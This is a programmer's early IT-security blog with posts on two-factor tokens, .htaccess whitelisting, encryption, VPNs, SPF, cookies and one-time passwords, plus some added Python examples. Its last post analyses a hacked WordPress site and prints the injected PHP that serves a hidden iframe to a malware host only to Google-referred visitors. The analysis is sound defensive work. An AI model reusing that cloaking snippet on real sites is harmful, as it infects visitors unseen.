A Programmer explores the IT Security field; offering packets of useful information he picks up along the way.

RSA 2008 and Yubikey

May 02, 2008 By: Ron Goodbin Category: Authentication

On Security Now podcast #141, Steve Gibson talks about his experience at RSA Conference 2008 a few weeks back. The RSA Conference is the largest of its kind in the world focusing on information security. I mentioned to a friend that I’m going to be at the RSA Conference in 2009 and I’m going to leave the kids somewhere and bring my wife. Ok, ok - that’s pushing it.

Steve gave out a URL which takes you to the RSA Conference keynote speakers so you can watch at your leisure. There is one really fascinating keynote address by Jeff Hawkins about brains and computers (AI) that is worth watching. Jeff Hawkins co-authored a book called “About Intelligence”.

At RSA Steve stumbled on a really cool new product called the Yubikey from a Swedish company called Yubico. The Yubikey is a very small USB authentication device. You plug it into your computer’s USB port and then go to, say, a website that is set up to support Yubikey. Touch the device and it will spit out a really long one-time password sequence. If you have the device that is associated with you (based on the device’s serial number, I would guess) then you are authenticated. In authentication speak this form of authentication would be something you have, while your static password is something you know. The really cool thing about this device is that the Yubikey contains a tiny keyboard so you don’t have hardware compatibility issues.

I need to learn more in order to fully explain how this works. What better way to learn about the product than to implement it? We talked about securing my blog’s “Admin panel” in a previous post. I have username/password, and for second-factor authentication I can use the Yubikey. I sent the company an email the other day expressing my interest in the product. I got a response back from the CEO.

“Thanks for your interest in Yubico….Since Steve Gibson sent his latest SecurityNow! podcast interest in our product has greatly exceeded our expectations. We are working hard to catch up with demand and sincerely apologize to all of you who are still waiting to receive shipments from us. We expect to be caught up within the next two weeks. ……. “

I’m sure the CEO is happy she met Steve at RSA. I’ll keep you updated on my progress in implementing the Yubikey on my blog’s “admin panel”. We also need to discuss “openID” since the yubikey is openID compliant. In short you can use your Yubikey when logging onto sites that support openID for an added level of security. Until next time..

.htaccess file

April 06, 2008 By: Ron Goodbin Category: Web Application Security

I’ve been reading and learning about web application security lately. As a programmer with experience in web redevelopment, I thought web application security would be the perfect place for me to get my security fix. I’m finding it very interesting. I decided that a good place to start learning was with my blog application: how can I better lock down this blog? My blog uses the very popular open-source blogging solution called WordPress. Recently I found a posting on Matt Cutts’s blog on some things you can do to secure your WordPress blog. Let’s discuss one of his simple recommendations I implemented.

The first thing I did was create a .htaccess file in my “wp-admin” directory.
AuthName "Access Control"
AuthType Basic
order deny,allow
deny from all
# whitelist home IP address
allow from 71.172.62.228
The .htaccess files are also called “distributed configuration files”, which allow you to restrict access to a particular resource in a web application. If you have access to the main configuration files (usually httpd.conf) on the server it is better to make these configuration changes there, since modifying the .htaccess file may cause your application to take a performance hit. My blog is hosted in a shared environment and therefore I don’t have access to the main configuration file. My .htaccess file essentially blocks everyone (all IPs) from accessing the www.itsecpackets.com/blog/wp-admin directory unless the TCP connection is made from the IP specified, which is my home IP address. When I access the admin page as the admin, I will still need to enter my username/password. This solution gives me another layer of security. Now keep in mind, with security comes a loss of convenience. I will not be able to log on to my WordPress admin panel from work (unless I add the IP address). The same applies if I’m at a friend’s house. There are always trade-offs when it comes to security - always.

Apple’s Big Announcement

March 20, 2008 By: Ron Goodbin Category: Apple

   

I’m a big Apple fan. There is big Apple news that I feel the need to share! Apple announced at their much publicized event on March 6th that they will be allowing developers to write programs for the iPhone and iTouch devices. The Software Development Kit or SDK is available to download from the Apple site. You will need a Mac running their new Leopard OS to write programs. People, this is really big!!! I was totally blown away watching the event the other evening. Apple invited 5 different companies spanning diverse industries, from games to medical software, to present their programs at the event. The developers had 2 weeks to program something new for the event. Some had never written software on the Mac before. The companies themselves were quite surprised to see what they were able to accomplish in such a short period of time. I think this move by Apple to invite third-party developers to program using the Apple SDK will propel the iPhone into new dimensions. This is a huge accomplishment. It is simply a revolutionary device, a hand-held mobile computer that is always connected. In my opinion, Apple is reinventing the personal computer.

Apple will be the gatekeeper for all these programs. The only way you’ll be able to install these programs on your iPhone is through the “App Store” on iTunes which will be accessible using wireless, as well. Developers will name the price for the programs they write. Apple will take 30% off the top and the developer will get 70% of the set price. Apple will be hosting the application, distributing and marketing your application. Developers will need to adhere to Apple’s rules when writing programs. No porn, no malicious software, no illegal or privacy software will be allowed. It has yet to be seen whether Apple will allow applications that might compete with their own applications. If Amazon wants to create an MP3 download service, would Apple allow it to compete with their own WIFI iTunes store application? Or let’s say Sun wants to create a JVM to allow Java programmers to write code; will that be allowed? Lots of questions surface but we’ll have to wait until the end of June to see what happens.

So, being a developer, I absolutely had to download the SDK. I downloaded the “Hello World” sample application and opened up the source code in Xcode (Apple’s IDE). With a click of a button I had the program running on the iPhone simulator. I wish I had more time to play with this! As we speak, developers all over the world are writing programs. Bloomberg reported today that the SDK had 100,000 downloads of programs in less than a week. Another interesting point that Adam from the Maccast brought up is what he calls the halo effect for developers. He thinks that once developers start creating iPhone programs, they will love the experience and will, thus, want to start developing for Mac products.

Another very cool iPhone feature that is specifically geared to the gaming companies is the accelerometer. The accelerometer detects when the device is turned or moved and the display is viewed differently as directed by the movement. You may view pictures or video in landscape mode or look at a webpage in wide screen. Developers can take advantage and code for how the device is moved in the 3D space. This is particularly applicable to game developers. At the demo, I was blown away by the graphics/accelerometer use in the game called “Spore”, developed by EA, and a monkey game by Sega. To control the game you move and tilt the iPhone; very cool stuff indeed.

Plausible Deniability

March 12, 2008 By: Ron Goodbin Category: Encryption, Privacy

There is an interesting concept that surfaces sometimes in business, politics or espionage called “Plausible deniability”. It involves the creation of chains of command that are loose enough to untie when the need arises. If high ranking officials or politicians become aware of disreputable or questionable activities, they may claim, using “Plausible deniability”, that there is no way of proving they had any knowledge of such activities. They can simply deny it, and since there is no direct connection to these high ranking officials, there can be no hard evidence linking them to the questionable activity or to the knowledge thereof. The Plausible deniability concept is also applicable in technology, as you’ll see.

There is this great open-source encryption software that you can install for free called Truecrypt. Since most people have bank statements or other sensitive files stored on their computers, this program is for everyone. You can easily set up what they call an “encrypted volume”. What is that? It looks just like any of the lettered drives on your computer, but it is really a container of all your encrypted documents. You can drag your sensitive files right into this new drive and use it just like any other drive, i.e. drive F: on your computer. Truecrypt performs “on the fly” encryption, which means that your file is encrypted and decrypted in memory as you work with it. When you are done updating a file, it is always written back to the volume encrypted so you never have to worry!

When you mount a Truecrypt volume you need to enter your password, and when the computer shuts down the volume is then unmounted. If you look at the file that is used to mount these encrypted volumes you’ll see random bits of data. There is absolutely no way to get any information about your data stored on the encrypted file; it’s just random noise. To give you an idea of how safe your data is, Truecrypt writes on their website:

“The only way to recover your files is to try to “crack” the password or the key, but it could take thousands or millions of years depending on the length and quality of the password/keyfiles, on software/hardware efficiency, and other factors.”

These guys really covered everything, so it is a highly secure system.  Truecrypt volumes are extremely easy to set up and their website is a great resource for how to get started and learn more about how this technology works.

Back to Plausible deniability. Let’s say that I created an encrypted volume and put some very sensitive files in my encrypted container; all is good and my data is quite safe. Now let’s suppose that some evil person gains access to your computer and forces you to give over the secret files he thinks you have. He knows that you’re smart and that you must have encrypted your sensitive data. You have no choice but to give him your password and he then can take your files! To get around this scenario, Truecrypt allows you to create a hidden volume. A hidden volume is an encrypted volume within another encrypted volume, each having different passwords. Now, in the case of the evil person, you can say to him “here are my secret files” and give up the password to the outer volume. The files you “gave” him in the outer volume are not really your sensitive files. The inner volume contains the truly secret files. When you open up the outer volume there is absolutely no way of knowing that there is a hidden volume inside. You have successfully invoked “Plausible deniability” in the sense that your adversary does not know anything other than that the outer volume exists and you do not “have” any secret files the adversary wants. The direct link was severed and you can deny any knowledge of those files.

In a future post we’ll talk about whole disk encryption, a new feature of Truecrypt. This solution is perfect for laptops or even desktops that contain sensitive data.

Hamachi, quick and easy VPN

February 24, 2008 By: Ron Goodbin Category: VPN

Before we had Apple’s OS X Tiger there was no way to do screen sharing across the Internet. My grandfather, who lives in Michigan, had just bought a new Mac. I wasn’t going to fly out there but he desperately needed some help showing him how to use his Mac. I, therefore, needed a way to control his computer remotely. In most households there is a router with at least one, if not multiple, computers sharing the Internet connection. This is, essentially, a network setup. We can share printers and share files between computers, amongst other things. With my grandfather, what I really needed was to be on his network; this way I could easily connect to his computer with his IP address. Now you’re going to ask, why don’t you just get his IP address and connect over the Internet without being on his network? Good question! Remember, his IP address is not the IP address of his computer, it’s the IP address of his router. The truth is it can be done, though we would need to configure his NAT router, punching some holes to allow certain traffic to flow through the router to his Mac. This type of configuration is complex and besides, there is no way my grandfather is going to be able to do this. What we need here is a VPN (Virtual Private Network) and Hamachi is just the solution, plus it’s free!

A VPN is a network that uses the public infrastructure, such as the Internet, to provide users with secure access to their organization’s network. Very often you will find corporate VPNs. What that means is an employee who is out on the road or working from home and needs access to the corporate network is able to gain access via the corporate VPN and thus work off-site. Since VPNs operate over the Internet, an insecure medium, there is a real need for bulletproof security using extremely robust encryption protocols.

I downloaded and installed HamachiX for the Mac. I was able to easily set up a network, then I gave the network a name and a password. Now that I had a VPN set up on my end, I had my grandfather install HamachiX on his Mac. He joined the network I created by using the name I gave it and the password. I was then able to see him logged in. I then had him configure his Mac to run the remote desktop service and also have his firewall accept the VNC client connection. VNC is remote control software which allows you to view and fully interact with a computer desktop. I fired it up on my Mac. I made the connection using the IP address that Hamachi gave my grandfather’s computer and the port the service was running on; voila! His screen appeared in the window. I was now able to control his computer. Hamachi is “zero configuration”, meaning I did not have to re-configure my grandfather’s router. It was like his computer was in my house on my network. I was able to telnet to his computer and I could even set up to print to his printer in Michigan if I wanted to.

 If you’re in a hotel away from home using the hotel’s insecure wireless, Hamachi would be a great solution to securely connect to your home computer and access files, or even browse the net off your home computer.  It’s really an intelligent solution for the small business or home user who needs to access computers across the net in a secure mode.

SPF

February 13, 2008 By: Ron Goodbin Category: Spam

There is a very neat open standard that is helping solve the ubiquitous SPAM issue. If you have an email account you must know what SPAM is. SPF stands for “Sender Policy Framework” and is an extension to the SMTP standard. We need to understand SMTP before we delve into SPF.

Most Internet technologies are based on the concept of a client/server relationship. Sending email is no different. When you browse on the Internet you have a browser (client) and the web server (server) that serves you the page. With email you usually have an email client that is configured to talk to an SMTP server for sending email. For receiving email your client can talk to a POP3 server or an IMAP server. When you compose an email there must be at least one recipient. Let’s say you have an account with Verizon (your ISP) and you are sending email to a Gmail recipient. You write your email and click “send” and the email is sent to Verizon’s SMTP server, the server that handles all outgoing email. The SMTP server then looks at the recipient and sees that the domain (after the @) is intended for someone over at Gmail. It then makes a DNS request to find the IP associated with its counterpart over at Gmail, which is Gmail’s SMTP server. Verizon’s SMTP server sends the email off to Gmail’s SMTP server. Gmail’s SMTP server will then see that the recipient has a Gmail account and it will drop the email into that person’s mailbox.

Now, if you open up an email and look at the headers, there will be a series of “Received” headers that will show you the path that the email took. This path looks like a stack, with the first one being the last destination. The “Received” header at the top is actually the last SMTP server that received the email and the bottom “Received” header is the first SMTP server that received the email. Every SMTP server that receives that email will stamp a Received header onto the email with the IP address of the client or server they received the email from. The Received header information becomes essential for SPF, as you’ll see.

The difficult part with this approach is that the FROM address can be spoofed. So my address rongoodbin@verizon.net can be substituted with bill@microsoft.com easily. Nearly all SPAM is sent by fake people who hijack people’s real email addresses. Spammers like to use addresses with domains that have credence on the Internet. You are more likely to read a piece of spam sent from john.goldstone@ibm.com than some other email like girly1234@aol.com. This type of thievery undermines the credibility of email, which is an unfortunate consequence, and as with other Internet technologies, security wasn’t even a thought at design time.

SPF was created to help remedy this problem and try to help restore confidence in email integrity. We need some way to authenticate the sender’s email address and not just blindly accept what was supplied as the true sender. Here’s how it works. We talked earlier about the email hopping as it goes from one server to the next en route to its destination. As it travels, the server will stamp the email with the IP address of where it came from. Say there is an email sent to someuser@gmail.com from someone claiming to be rongoodbin@verizon.net. Now, if Gmail is configured to operate with SPF, Gmail will then make a DNS request for the SPF record that verizon.net has configured and stored. This SPF record from Verizon tells Gmail what IP range this email should be coming from. Gmail then checks the IP address from the Received header on the email. Remember, an IP address can’t be spoofed, as we saw with my question on Security Now post. If the IP address checks out ok - meaning that it’s in the range allowed by the SPF record - then we know this email was actually sent by Verizon’s SMTP server and not someone from a different SMTP server out in Russia sending mail on behalf of a verizon.net user. Now this valid email will be forwarded to the recipient’s mailbox. If it turns out to be invalid, then the email is discarded. SPF, along with other technologies, is definitely a step in the right direction in the constant fight against SPAM.

CIA Triad

January 26, 2008 By: Ron Goodbin Category: InfoSec 101

The CIA triad is a very fundamental and important security model in Information Security. There are three key (triad) principles that every organization should subscribe to. If any of these key areas of security can be breached, there is a serious flaw in the policies and practices of the organization.

Confidentiality ensures that private information is accessed by only those that have the appropriate authorization to do so. Encrypting data is an example of this principle of ensuring confidentiality. We saw an application of confidentiality in my post on the ‘Java Hashing Class’. When we entrust our private data to an organization it is absolutely essential that this information is kept just that - private. A company can easily go out of business if users’ private data is leaked in a breach.

Integrity is about data consistency. Organizations need to be certain that their data is not being modified in any way by unauthorized or even authorized people or processes. If a bank employee decided to access your savings account and pull one zero off your balance, you wouldn’t be too happy. Data must also be consistent while in storage and also in transit.

Availability is the concept that a resource is available to you when you want to access it. My online banking site needs to be accessible when I want to use it, even if that means accessing it at 2:00 am on a Sunday. Most websites that serve a business or public need must adhere to this principle of the triad or else they would simply go out of business. Ebay, for example, would be seriously hurt if their site was inaccessible for even a short time. A DoS (Denial of Service) attack is when a website is flooded with so many requests in a very short period of time that the site crashes from the load. The attacker is not trying to gain access; their goal is to make the site unavailable to its users.

All of these security principles are important to every organization. However, each organization needs to understand their business and may stress more importance on one of the principles over another.

Web Cookies

December 30, 2007 By: Ron Goodbin Category: Internet security

Since most people love cookies, I thought I’d explore the web cookie topic. Some people have the misconception that cookies can do nefarious things to your computer like copy your files, reveal your identity or damage your computer in some way. As a web user you should understand what cookies do and some of the privacy concerns they raise. With this knowledge I hope you can make an informed decision on what kinds of cookies you allow or block at the browser level, based on your comfort level.

Let’s say you open your browser and go to ‘http://www.amazon.com/’. You’re visiting the site using a browser and acting as the client, while Amazon.com, running a web server, is the server side. The webserver handles HTTP requests. HTTP is a stateless protocol, meaning, when I go to a page at Amazon, the webserver sends the page to my browser and I see it. When I click on a book that I like, a new request is sent to the webserver and a new page is sent back to my browser. The webserver has no knowledge of the previous page I clicked. They are like humans with no memory, constantly meeting new people. Now you’re going to ask, “What do you mean that Amazon.com is stateless when it shows my name when I visit and it seems to know what books I like?”. Good question. This is where cookies come into play. Cookies allow a webserver to interact with a client in a stateful fashion. A cookie is a parcel of text that is sent to the server with each request, which allows the server to remember the client.

There are different types of cookies used on the internet: persistent cookies and session cookies (or transient cookies). Each of these types of cookies can be turned on or off in the browser settings. A session cookie allows the webserver to know who you are as you move from page to page. Session cookies store information in the browser memory, which is available for the duration of the browser session. This information is only available as long as your browser remains open. If you close your browser, the session cookie information is gone. It’s called a session cookie for the reason that this type of cookie has a short life. For example, your bank’s site will establish a session cookie after you log on that is valid as long as you are interacting with the bank site. However, if you walk away from your computer for a snack, chances are your session will be invalid so that when you try to click on your checking activity, you’ll be prompted to log in again. This ensures against someone walking over to your computer and viewing your private financial data.

A neat little trick to view your session cookie details is the following: Go to a site like ‘amazon.com’ or your bank site (really most sites establish a session cookie to know you as you move around). When you’re on that site, copy and paste ‘javascript:alert(document.cookie)’ into your browser. You’ll see a bunch of name/value pairs. One of them is the SID or session-id, which is the ID that tells the webserver who is making the request. Very cool indeed.

The other type of cookie is called a ‘persistent cookie’. This cookie is actually stored on your computer in a little file with information that is used by the webserver to identify you. When you return to a site that already has a cookie stored on your computer, the browser automatically passes on the cookie with the request. The webserver now has some identifying data. Now if you visit a site and see that your userid is already populated or if you go to, say, amazon.com and it says, “Welcome back Ron”, the persistent cookie makes this possible. If website A stores a cookie on your computer, website B can’t access the cookie. However, even if a website somehow was able to access a cookie from another site, the information in the cookie would not make sense. Only the issuing website would be able to make sense of the data stored in the cookie. Another application of a ‘persistent cookie’ is that it can store information about you that will help the website create a page that was customized by you. The cookie files are stored in /Windows/cookies or in /Windows/profiles/username/cookies directories, where username is replaced with the user’s login name. If your operating system directory is not named Windows (such as Winnt for Windows NT) then look in that directory instead of the Windows directory. If you like, you can delete all of them or delete them for sites you don’t want to be storing cookies.
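The two cookie types side by side, as an added example that is not part of the original post: it parses `Set-Cookie` headers, reports which cookies are session or persistent and which ones the `document.cookie` trick would display (a cookie flagged `HttpOnly` is sent with every request but hidden from scripts), and shows the server turning the opaque id back into state. The header values, cookie names and session table are constructed samples.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie headers, as a site might send them after login.
SAMPLE_HEADERS = [
    "session-id=7f3a9c; Path=/; HttpOnly",             # no lifetime given
    "remember-user=u-1842; Max-Age=31536000; Path=/",  # kept for a year
]

# Constructed server-side table: only the issuing site can map the id
# in the cookie back to a person.
SAMPLE_SESSIONS = {"7f3a9c": "Ron"}


def classify(set_cookie_headers):
    """Return {cookie name: {'lifetime', 'script_visible', 'value'}}."""
    report = {}
    for header in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            # No Expires and no Max-Age: the browser keeps the cookie in
            # memory only and drops it when the browser session ends.
            persistent = bool(morsel["expires"] or morsel["max-age"])
            report[name] = {
                "lifetime": "persistent" if persistent else "session",
                # HttpOnly cookies never show up in document.cookie.
                "script_visible": not morsel["httponly"],
                "value": morsel.value,
            }
    return report


def greet(cookie_header, sessions):
    """Server side: use the Cookie request header to recognise the client."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    sid = jar["session-id"].value if "session-id" in jar else None
    user = sessions.get(sid)
    return f"Welcome back {user}" if user else "Hello, please sign in"


if __name__ == "__main__":
    for name, info in classify(SAMPLE_HEADERS).items():
        print(name, info)
    # Same stateless server, two requests: one with the cookie, one without.
    print(greet("session-id=7f3a9c; remember-user=u-1842", SAMPLE_SESSIONS))
    print(greet("", SAMPLE_SESSIONS))
```
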

So what’s the bottom line? Are cookies dangerous in any way? Should I block cookies from being set? The truth is that cookies aren’t dangerous and cannot do anything detrimental to your computer. Cookies can’t get any more information about you than what you give the website issuing the cookie. Also, cookies are not able to aid the webserver to read files on your computer.

A good practice that users employ is to browse the internet with cookies turned off by default. Once you visit a site and decide to trust that site, you can then proceed to add the site and allow your browser to accept cookies from this site. You can also view the site’s privacy policies to make sure that you’re comfortable with their policies.

In a future post I will talk about third-party cookies. These cookies raise privacy concerns, since they allow ad companies to track the different types of site you visit and then tailor their ads based on the data collected.

Perfect Paper Passwords

December 20, 2007 By: Ron Goodbin Category: Authentication, Encryption

Steve Gibson of “GRC.com” has successfully implemented a very cool and extremely robust multi-factor authentication for his GRC employees who need access to a web admin console. He shares his implementation on a series of podcasts found here. The cool thing about this form of authentication is that he assumes “perfect knowledge”. This means that Steve’s one-time password scheme is extremely secure. So secure, in fact, that if a keystroke logger residing on that machine is recording the keystrokes while a user attempts to log in - that information would not aid an attacker in future attempts to log in. Most sites you visit that contain the typical user log-in, including your online banking site, would be vulnerable to a keystroke logger attack. That is because they require a password that is static. This means the password doesn’t change each time a user logs on. A keystroke logger would be able to identify your password as you type on the keyboard. Armed with this knowledge of your password the attacker can masquerade as you in a future log-on attempt. Another term for this attack vector is a “replay attack”.

In Steve’s “PPP system” the four-character password, which is a passcode, is different each time the user logs on. There are 16,777,216 possible combinations for each passcode and since no passcode is ever reused, a replay attack would be impossible. The passwords are displayed on a credit card sized piece of paper that can be easily stored in one’s wallet. Steve uses some heavy duty encryption with a highly pseudo random 256 bit key to generate these series of passcodes. Each user will have a 256 bit key that will define the series. This key is stored on the server and the user doesn’t know this key. Another nice feature with this system is that the server will keep track of the passcodes of prior logons, and prompt the user for which passcode it wants the user to enter. Each column is a letter and each row is a number, therefore the server might show “3E [1]:” so you would type in the passcode in the 5th column, 3rd row on the first page. You can also print out your own passcode sheets, and if you ever lose a sheet you can tell the server to forward you on to the next sheet, invalidating the prior passcodes.

The PPP system was well received in the security community and some very practical open-source implementations were created. I downloaded and installed the PPP for PAM module, which allowed me to use PPP when I log on remotely to my Mac using SSH. Interestingly, Steve mentioned that when his employees log on using PPP they also supply a static password in addition to the PPP password. The reason behind this is that if the sheet of passcodes (something you have) got into the wrong hands they would be able to log in as you. However, they still need the static password that only you know, to log on.
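The challenge and one-time check described above, as an added example that is not Steve Gibson's PPP code and not part of the original post: passcodes are derived with HMAC-SHA256 over a counter as a stand-in for the cipher PPP uses, and the 64-character set and the card layout of 7 columns by 10 rows are assumptions chosen to match the 16,777,216 (64^4) figure and the “3E [1]” style prompt.

```python
import hashlib
import hmac
import secrets

# Assumed 64-character set with look-alike characters left out;
# 64**4 == 16,777,216 possible four-character passcodes.
ALPHABET = "!#%+23456789:=?@ABCDEFGHJKLMNPRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
COLUMNS, ROWS = "ABCDEFG", 10            # assumed layout: 70 passcodes per card
PER_CARD = len(COLUMNS) * ROWS


def passcode(key: bytes, index: int) -> str:
    """Derive the four-character passcode at position `index` of the series."""
    digest = hmac.new(key, index.to_bytes(16, "big"), hashlib.sha256).digest()
    # 64 divides 256 evenly, so reducing each byte mod 64 adds no bias.
    return "".join(ALPHABET[b % 64] for b in digest[:4])


def challenge(index: int) -> str:
    """Render a position as the prompt shown to the user, e.g. '3E [1]'."""
    card, offset = divmod(index, PER_CARD)
    row, col = divmod(offset, len(COLUMNS))
    return f"{row + 1}{COLUMNS[col]} [{card + 1}]"


class Account:
    """Server-side state: the secret key and the next unused position."""

    def __init__(self, key: bytes):
        self.key = key
        self.next_index = 0

    def prompt(self) -> str:
        return challenge(self.next_index)

    def verify(self, typed: str) -> bool:
        expected = passcode(self.key, self.next_index)
        ok = hmac.compare_digest(typed.encode(), expected.encode())
        if ok:
            self.next_index += 1         # a passcode is never accepted twice
        return ok

    def skip_to_next_card(self) -> None:
        """Lost card: invalidate whatever is left on the current one."""
        self.next_index = (self.next_index // PER_CARD + 1) * PER_CARD


if __name__ == "__main__":
    key = secrets.token_bytes(32)        # 256-bit key, known only to the server
    account = Account(key)
    print("server asks for", account.prompt())
    typed = passcode(key, 0)             # what the user reads off the card
    print("first use accepted:", account.verify(typed))
    # A keystroke logger replaying the captured passcode gets nowhere.
    print("replay accepted:", account.verify(typed))
    print("server now asks for", account.prompt())
```
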

My good friend’s site got hacked.

November 18, 2007 By: Ron Goodbin Category: Internet security

A friend of mine, Shimon Sandler, has a website that got hacked. He turned to me for help. Shimon runs a popular blog on SEO (Search Engine Optimization). When you do a search in Google for “Shimon Sandler” he is always number one (he’s very good at what he does). A few weeks back Shimon’s site got “blacklisted”, which means that when you clicked on the link to his site a message popped up on your screen. It said, “Warning: visiting this site may harm your computer”. With the help of Matt Cutts from Google we discovered the “mal-ware”! This malicious software reared its ugly head ONLY if the page prior (Referrer) was any page from Google. The “curl” command came in handy in this case. You certainly never want to click on a suspicious link. Curl is a command that allows you to download a URL so that you can view it in a text editor rather than requesting it in a browser.

1. Fetch the page with a Google referrer:
curl -H 'Referer: http://www.google.com/search?hl=en&q=rbn' http://www.shimonsandler.com/ > /tmp/1

2. Fetch the page with no referrer:
curl http://www.shimonsandler.com/ > /tmp/2

3. Compare the two pages:
diff -u /tmp/2 /tmp/1

The cloaking/malware is included via this line:
<iframe src="http://302found.net/in.cgi?20" mce_src="http://302found.net/in.cgi?20" style="display:none;"></iframe>

As you can see, I requested two pages. One was just straight www.shimonsandler.com with no Referrer page and the other was www.shimonsandler.com with a Google Referrer in there. The one with the Google Referrer shows an iframe with a suspicious link! That is the “mal-ware”.
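The same comparison as steps 1 to 3, as an added example in Python that is not part of the original post: it parses both saved responses and reports iframes that appear only when a search-engine referrer was sent, flagging the hidden ones. The two pages and the `.example` hosts are constructed samples standing in for the files saved by curl.

```python
from html.parser import HTMLParser

# Constructed stand-ins for /tmp/2 (no referrer) and /tmp/1 (Google referrer).
PAGE_NO_REFERRER = (
    "<html><body><h1>Blog</h1>"
    '<iframe src="http://media.example/player" width="400" height="300">'
    "</iframe></body></html>"
)
PAGE_WITH_REFERRER = PAGE_NO_REFERRER.replace(
    "</body>",
    '<iframe src="http://injected.example/in.cgi?20" style="display:none;">'
    "</iframe></body>",
)


class _IframeCollector(HTMLParser):
    """Collect (src, hidden) for every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        # Common ways of keeping a frame out of sight of the visitor.
        hidden = (
            "display:none" in style
            or "visibility:hidden" in style
            or a.get("width") in ("0", "1")
            or a.get("height") in ("0", "1")
        )
        self.frames.append((a.get("src", ""), hidden))


def iframes(html: str):
    """Return [(src, hidden), ...] for all iframes in the HTML text."""
    parser = _IframeCollector()
    parser.feed(html)
    return parser.frames


def referrer_only_iframes(with_referrer: str, without_referrer: str):
    """Iframes served only when the request carried the referrer."""
    baseline = {src for src, _ in iframes(without_referrer)}
    return [
        (src, hidden)
        for src, hidden in iframes(with_referrer)
        if src not in baseline
    ]


if __name__ == "__main__":
    for src, hidden in referrer_only_iframes(PAGE_WITH_REFERRER, PAGE_NO_REFERRER):
        label = "hidden" if hidden else "visible"
        print(f"only with referrer ({label}): {src}")
```
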

I then logged onto Shimon’s web-server and found the server code responsible for displaying this iframe link.

Here is the command I used to find which script file contained “302found”.
find . -exec grep 302found {} /dev/null \;

Here we are:
./wp-content/themes/SS-shimon_sandler/sidebar.php:<? $rf = $_SERVER['HTTP_REFERER']; $se = "google"; if (preg_match("/$se/",$rf)) { echo '<iframe src="http://302found.net/in.cgi?20" mce_src="http://302found.net/in.cgi?20" style="display:none;"></iframe>';} ?>

You can see the code is doing a check on the REFERRER, and if the URL contains “Google” then it writes out to the HTML this nasty iframe, which is set so no one could see it on the page.

Soon after I took out that code in the PHP file, Shimon’s site was once again white-listed.

Here is a great link I found with details on what to do if your site gets hacked. Even if your site was never hacked it’s worth it to spend the time to review some basic suggestions on how to properly secure your site. Remember, as with all passwords, make sure it’s a strong password. Any password that is just a word, like ‘pumpkin’ or ‘dandelions’, is extremely weak. I can’t say exactly how Shimon’s site got hacked, although if you follow some good security principles, it will better protect you and possibly prevent an attack like this.